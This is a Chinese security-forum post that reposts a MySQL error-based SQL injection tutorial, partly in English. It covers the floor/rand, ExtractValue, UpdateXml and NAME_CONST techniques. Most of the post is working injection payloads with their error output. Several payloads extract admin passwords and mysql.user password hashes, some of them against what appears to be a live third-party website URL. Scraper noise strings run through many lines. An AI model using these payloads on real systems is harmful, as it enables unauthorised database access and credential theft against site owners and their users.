找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3152|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
. R  Q3 q! e% s+ ~" Z, r( x首先进行正常查询:

mysql> select * from article where id = 1;( H- u7 Q3 w2 Q0 G" O/ c# H+ x
+—-+——-+———+9 v6 J% ~4 g4 L
| id | title | content |
( U% Y8 B- ~, }! i: Q+—-+——-+———+9 @4 b2 K- t# |1 C8 l
|  1 | test  | do it   |6 `; S( t9 y2 A$ b" Q
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
6 S& R  C) ~3 `5 f$ cERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
6 Z7 w5 S+ O# E- g5 g9 E- K例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ U$ F; }7 W& [7 x/ G2 \ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
) a0 |: ^) l. g- `7 u% F& hERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue# \) W- B, `3 X" r8 L4 j# B. Q
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–& I" ~. q. Y" Q
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

0 k: t* u% r8 ?  Y8 E+ }$ S

5 w5 ?" t+ Q- B8 m% A& Q# j$ m

再收集:

; b5 i" j) u$ V$ Z# n) Q# q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 3 }' e2 u& t' l/ s

( h9 i+ ]: G7 C5 s: k5 n0 b' V+ X1 wErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
6 v. |: R% y4 P- {9 M* b; J! t0 |2 g- X" w. h1 }
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)+ P* F; m! T. X/ f

! A+ K1 ]5 E: I. v# S9 bErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
4 e9 c( p) s' l+ P9 v% e
6 f. N! A: G& QMYSQL高版本报错注入技巧-利用NAME_CONST注入* j/ z# ~; l. X" D4 F, `4 D0 l
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. & C! u3 U% h0 H" Q% `
1 C/ ?. i7 q* e9 b# G7 a1 E1 z( ?

( H( y1 F- ^4 Z6 E! a- k2 c相关信息) m6 I* l3 E0 T% z+ a

) [3 H& c  \/ N8 z; HNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.* u' J/ w6 k4 ?) ]+ z
. l* Y9 g* K+ m7 t, P
Code:
/ ^$ u' Y2 g4 ^; RNAME_CONST(DATA, VALUE)
/ d/ r( o+ N" F: J& i! g
$ X+ E) {8 M4 ?5 t# \Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
) F4 r4 @: G; `6 C! [0 a
  w- z+ y) y; gSELECT NAME_CONST('TEST', 1)5 S5 I0 k: F+ [; k+ P
6 v3 \$ T+ \% V" c% M

4 t1 L! V9 r2 S0 H  Q8 T4 }
. |% K5 S: p+ q9 i|---------------|' X+ ~# Y3 y: S, {* w  B
|     TEST      |1 p$ N% x7 G- j' S& d
|               |
, Y0 M: E$ U( [|---------------|# T( x$ m; v$ h! ^  G; s
|       1       |
# O0 C" m# p- p# o( l|               |' J9 Y! P2 }/ P! e% z
|---------------|
% s0 ~+ v  A% s% @0 Y; i, c/ k0 d

( [  M1 ^, z. i0 b
2 ?1 x. I6 k! \7 U* C% {
; n) g% `1 B! K) [
% w; a+ ~: Q6 g/ i5 W1 Qhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
! g. e$ g4 Y8 u- IIntro to MySQL Variables
6 w, Q! Y# O4 T4 D! f  r& k
1 A! a  t3 V, Z/ sOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
  T  U6 u7 Q2 }6 T4 B& v: M' n
! ~; v9 d( \2 ^0 ^2 wCode:
5 ^: U+ \$ j5 ~http://www.baido.hk/qcwh/content ... ;sid=19&cid=261  v- T, Y" g1 G2 I3 S
% a  n- X, f1 _, ?

) G* M1 g0 m& i* R% R# q( [& F, X- f, w# x& y9 h
1 n4 ^) {$ @& i& W6 f
2 f3 q0 V. H) C: n+ i
Code:& o# x: j- `, S* Q
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--2 Q( W# M1 u5 U0 \2 ^

1 _, Y& P# ^# _
8 l7 ]- P0 P2 W$ k3 T4 YVAR = Your MySQL variable.
; J5 r1 R8 |2 c' |6 F* i4 x. g3 ]" a( @! B- W2 ^& b3 z
MySQL 5.1.3 Server System Variables6 e* G% a% N" |) y- W6 w5 k
7 i, \( z2 J$ q4 \0 @7 R
Let's try it out on my site.." C% Y7 }8 d0 b7 h) F
9 `, B: i" J6 M1 p# N
Code:
+ a- J9 {2 G# I+ Shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
  J+ R' H% V/ G* H2 ^/ W
5 J) \* ~. P! ^' C1 j. ?0 [Erroruplicate column name '5.0.27-community-nt'
$ c+ o# B# D9 ?: T. x

; G9 v: Q4 Q3 d, F4 l
, ?3 `9 Y0 r$ A9 e0 u( ]% u+ |- H8 l; q" k: P7 K' E# w: b) h
9 P0 J) |( K) h6 d8 l0 ?

1 i, c. w8 B7 T0 CNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...! K' z/ h4 c* L9 D# D5 m7 ^
" \7 F+ V7 `, H3 S+ C  y
Data Extraction% [3 f) K0 s4 R. g( A
9 X7 s( W+ U/ X$ A: C% @
Code:
! C( F2 {/ R/ u+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--0 R% O0 \5 p( b+ b

+ T/ U: J6 C' I! k# @! m: D0 o' ~- n& x5 N; S- S7 w! t2 b' u
We should get a duplicate column 1 error...
$ Y' M% Y. ?( B: u, n, O9 B- h1 W) I3 H% g' e4 a
Code:4 a5 N# D6 F3 x* C% ]5 ^! i
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--% Y6 a( W4 A- J& |0 o+ ?  }

, m) F0 }+ d5 Z5 F+ h+ M) {Erroruplicate column name '1
+ A/ N: e) N8 h; @/ G$ r& Q
# Y0 q2 L0 H; A$ v. q4 e1 {
" t' z0 N" f6 M) _9 C  A" R+ k

) x/ \3 s7 L! Y6 w3 S9 y& h; f0 V3 H+ L/ x( e8 o5 ]

& E6 _0 ?( z- }# q, i$ k9 E( z, v) d7 Z
Now let's get the tables out this bitch..
* e; h( R& h5 o- R+ B
# U$ ^; k; D% NCode:
7 r2 q3 p3 l" u; |( T+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--3 Z# i) {3 `; Q1 S6 l; M0 k
# y- w6 |- D% ?1 R

9 g$ G7 Q2 C! q' e* U: p& W! W% wLet's see if it works here, if it does, we can go on and finish the job.
* k  L$ E% h* @
5 Z' l0 U6 t) }: B- d  XCode:
5 G7 U# ]+ V6 a) G" c) Xhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
# Q# H% W$ x3 M* m$ B, U% k
9 A1 G0 l5 {* p/ N
# |/ J- G8 T8 y+ e3 RErroruplicate column name 'com_admanage8 j  P4 l7 y- j& y' j$ r8 x& t

( W, v- Q, T0 m; ~/ t6 U
) q5 G: M/ r7 W6 d  p# o0 o* q) W/ Q+ X6 R  G  k2 ~
( O  c% x! x6 d! o
1 S$ z8 w2 w, K6 i: {

$ c8 n7 r& A! cNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
. ~0 J2 f( U6 B' K
0 j1 [0 N$ \, QLet's get the columns out of the user table..
2 R. [/ x, i5 v. a( Q, A6 @( Z0 @; ^5 ]
Code:& {# I( E* k4 i' c$ Z
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--" U2 D6 G, N# s& f( N1 h

* p* N3 |( x( Q- K" D' `. ~; `/ h. @% y* U
- F6 x) m) s) j6 _So mine looks like this, and I get the duplicate column name 'Host'.5 h" l3 H2 [; H* x3 y# P
1 K0 \8 f# c2 F0 F  w1 T
Code:' C, X" k" T2 f! p
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
$ O$ I' Q8 M( Y, O3 f* T4 q* ~* r( ^1 ~2 E6 [
Erroruplicate column name 'Host'( S+ i' l4 X5 m8 c3 \5 X& [0 t

$ p) v" T0 m, _# J
/ L1 n, g4 p* p8 ~% t6 O) {. S) p8 a. L

9 h' J9 R, v  v: e: _4 Q
. ^0 y" u6 n/ }' [& n' k' A' p$ N
* I* A8 l* g$ h7 j& M
Woot, time to finish this bitch off.& y! K' E8 _) C: [+ J

: c; m1 B! u) K: X5 mCode:$ t$ M! t! W' T  X0 ~
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
0 t1 {7 l* c1 k) b" i' R

8 K( t2 e# Y5 M) Z' S5 u, z
; b# U" C$ [3 }: y0 wSo mine looks like this...
. i- K' c0 ?; L
5 z! n8 p' T& v# R. I: M, UCode:4 W1 y4 f6 [2 g! s9 P2 q
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--* r6 l- k7 A; J. }4 e* u$ B! i

6 G" Y" b# m$ W4 G$ k5 X2 CErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
) C8 A: N8 y* A2 _* J

* L* s1 k* T9 K, @+ x5 e* h0 H  D3 \/ |8 D3 i* n3 o8 D
: a& x0 T8 j7 k# Q  g7 G
& F. Z9 L9 V9 V! G9 u1 H0 K5 K
" s$ I2 L8 g  C. W8 P* K
( j# `) V& B# X; L; L% n. x
And there we have it, thanks for reading.
' u' n& M  h3 T+ S$ ~  g! S6 A
, l  O; @/ m7 O$ O' p) Q( V* K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表